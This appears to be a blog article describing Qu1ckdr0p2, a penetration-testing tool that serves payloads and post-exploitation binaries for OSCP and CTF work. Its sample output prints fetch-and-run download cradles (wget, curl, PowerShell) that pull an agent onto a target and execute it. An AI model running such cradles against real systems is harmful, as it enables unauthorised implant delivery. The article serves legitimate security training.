Cyber security

Qu1ckdr0p2 – A Powerful Tool For Rapidly Hosting Payloads And Post-Exploitation Bins

In the world of cybersecurity and penetration testing, speed and efficiency can make all the difference.

Enter Qu1ckdr0p2, a versatile tool designed to rapidly host payloads and post-exploitation bins over HTTP or HTTPS.

Whether you’re preparing for exams like OSCP or CTFs on platforms like Hack The Box, this article explores how Qu1ckdr0p2 simplifies the process, providing an essential tool for cybersecurity professionals and enthusiasts alike.

Rapidly host payloads and post-exploitation bins over HTTP or HTTPS.

Designed to be used on exams like OSCP / PNPT or CTFs HTB / etc.

Pull requests and issues welcome. As are any contributions.

Qu1ckdr0p2 comes with an alias and search feature. The tools are located in the qu1ckdr0p2-tools repository. By default it will generate a self-signed certificate to use when using the --https option, priority is also given to the tun0 interface when the webserver is running, otherwise it will use eth0.

The common.ini defines the mapped aliases used within the --search and -u options.

When the webserver is running there are several download cradles printed to the screen to copy and paste.


When you go to copy and paste a download cradle, depending on your terminal emulator of choice you may have to QUICKLY triple or double click the download cradle to highlight it for a copy. This will be fixed in a later version.


Using pip is the only supported way of installing

Cloning this repository to install will probably break something

pip3 install qu1ckdr0p2

echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc
source ~/.zshrc


echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc
source ~/.bashrc

serv init --update


Serv a single file located in your current working directory

$ serv serve -f implant.bin --https 443
$ serv serve -f file.example --http 8080

Update And Help

$ serv --help            
Usage: serv [OPTIONS] COMMAND [ARGS]...

  Welcome to qu1ckdr0p2 entry point.

  --debug  Enable debug mode.
  --help   Show this message and exit.

  init   Perform updates.
  serve  Serve files.
$ serv serve --help
Usage: serv serve [OPTIONS]

  Serve files.

  -l, --list         List aliases
  -s, --search TEXT  Search query for aliases
  -u, --use INTEGER  Use an alias by a dynamic number
  -f, --file FILE    Serve a file
  --http INTEGER     Use HTTP with a custom port
  --https INTEGER    Use HTTPS with a custom port
  -h, --help         Show this message and exit.
$ serv init --help       
Usage: serv init [OPTIONS]

  Perform updates.

  --update            Check and download missing tools.
  --update-self       Update the tool using pip.
  --update-self-test  Used for dev testing, installs unstable build.
  --help              Show this message and exit.
$ serv init --help       Usage: serv init [OPTIONS]
  Perform updates.
Options:  --update            Check and download missing tools.  --update-self       Update the tool using pip.  --update-self-test  Used for dev testing, installs unstable build.  --help              Show this message and exit.
$ serv init --update
$ serv init --update-self

Serv A File From A Mapped Alias

The mapped alias numbers for the -u option are dynamic so you don’t have to remember specific numbers or ever type out a tool name.

$ serv serve --search ligolo               

[→] Path: ~/.qu1ckdr0p2/windows/agent.exe
[→] Alias: ligolo_agent_win
[→] Use: 1

[→] Path: ~/.qu1ckdr0p2/windows/proxy.exe
[→] Alias: ligolo_proxy_win
[→] Use: 2

[→] Path: ~/.qu1ckdr0p2/linux/agent
[→] Alias: ligolo_agent_linux
[→] Use: 3

[→] Path: ~/.qu1ckdr0p2/linux/proxy
[→] Alias: ligolo_proxy_linux
[→] Use: 4
$ serv serve --search ligolo -u 3 --http 80

[→] Serving: ../../.qu1ckdr0p2/linux/agent
[→] Protocol: http
[→] IP address:
[→] Port: 80
[→] Interface: eth0
[→] CTRL+C to quit

[→] URL:

[↓] csharp:
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'

[↓] wget:
wget -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent

[↓] curl:
curl -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent

[↓] powershell:
Invoke-WebRequest -Uri -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent

⠧ Web server running

Tamil S

Tamil has a great interest in the fields of Cyber Security, OSINT, and CTF projects. Currently, he is deeply involved in researching and publishing various security tools with Kali Linux Tutorials, which is quite fascinating.

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